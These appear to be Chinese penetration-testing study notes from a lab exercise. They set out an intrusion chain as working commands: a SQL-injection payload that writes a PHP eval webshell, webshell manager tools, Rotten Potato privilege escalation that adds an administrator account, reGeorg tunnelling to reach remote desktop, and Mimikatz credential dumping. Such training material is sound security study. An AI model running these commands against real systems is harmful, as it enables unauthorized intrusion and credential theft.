(传参后界面变化,删除传参也不会改变)可能是http变成了https,插件问题
SQL注入可以写webshell
into outfile 导出文件
into dumpfile 导出文件
将查询的结果导出成文件
http://xxx.com/?id=1 union select 1,"<?php eval($_REQUEST[8])?>" into outfile 'C:/phpStudy/WWW/456.php'
Webshell管理工具
菜刀、蚁剑 => 一句话木马直接连接(默认流量没有加密)
冰蝎、哥斯拉 => 流量加密,一定要用专属马
github.com
提权
当我们遇到不是管理员的权限时,需要提权
1、利用目标主机上的服务提权(目标主机运行着xxx软件,但这个软件有漏洞可以利用)
2、利用web服务(一台机器上可能有多个网站,多个web容器)
3、利用Windows漏洞|Linux漏洞
系统漏洞
systeminfo
https://i.hacking8.com/tiquan/ 辅助提权网页
烂土豆
菜刀连接后,烂土豆拖进文件内
444.exe -p "net user as A1B2C3!.Qa /add" 添加用户
444.exe -p "net localgroup administrators as /add" 提升管理员权限
远程桌面只有管理员可以连接
netstat -ano 看端口,开了远程桌面
正向连接 请求 => PHP => 发送出去(不需要外网)
反向连接 目标 => 连接攻击者 (需要有外网)
3389咋么连接?
PHP作为中间媒介(php可以帮助我们发起请求)
reGeorg
可以将我们传输的数据给目标站点,成为沟通的桥梁
python2 reGeorgSocksProxy.py -u http://afsgr16-b1ferw.aqlab.cn/img/123.php -p 5242
监听电脑的5242端口
全局代理 =>需要的是所有流量 =>浏览器的代理
猕猴桃
privilege::debug 提升权限
sekurlsa::logonpasswords 抓取密码
- sql注入拿shell (into outfile into dumpfile)
- Webshell管理工具(冰蝎菜刀)
- 内网穿透(通过reg来设置中转站,然后用代理工具代理远程桌面(Proxifier))
- 提权辅助页面,查询系统可能存在的漏洞
- 利用魔改版烂土豆提权
- 通过猕猴桃抓取系统存储密码